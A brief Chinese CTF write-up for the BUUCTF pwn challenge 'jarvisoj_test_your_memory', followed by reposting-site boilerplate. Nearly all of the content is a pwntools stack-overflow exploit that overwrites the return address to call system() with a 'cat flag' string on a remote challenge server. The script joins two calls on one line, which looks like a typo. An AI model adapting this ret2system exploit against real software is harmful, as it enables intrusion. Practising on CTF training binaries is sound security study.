[BUUCTF-pwn]——jarvisoj_test_your_memory

[BUUCTF-pwn]——jarvisoj_test_your_memory

直接通过提示栈溢出

exploit

from pwn import*
p=remote('node3.buuoj.cn',"29320")
context.log_level = 'debug'
payload='a' * (0x13 + 4)+p32(0x8048440)+p32(0x8048677)+p32(0x80487E0)#system      main             cat flag
p.sendline(payload)p.interactive()


本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!

相关文章

立即
投稿

微信公众账号

微信扫一扫加关注

返回
顶部